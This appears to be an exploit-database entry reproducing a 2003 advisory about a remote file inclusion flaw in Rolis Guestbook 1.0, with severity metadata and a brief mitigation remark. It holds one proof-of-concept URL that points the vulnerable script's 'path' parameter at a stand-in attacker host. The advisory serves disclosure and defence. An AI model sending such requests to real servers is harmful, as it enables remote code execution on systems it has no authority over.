header-logo
Suggest Exploit
vendor:
Rolis Guestbook
by:
SecurityFocus
8.8
CVSS
HIGH
Input Validation
20
CWE
Product Name: Rolis Guestbook
Affected Version From: 1
Affected Version To: Unknown
Patch Exists: YES
Related CWE: N/A
CPE: a:rolis:rolis_guestbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2003

Rolis Guestbook Input Validation Vulnerability

Rolis Guestbook is vulnerable to an input validation issue that allows an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

Mitigation:

Input validation should be used to prevent malicious code from being executed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. 

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/

Navigation

Suggest Exploit

Services By CQR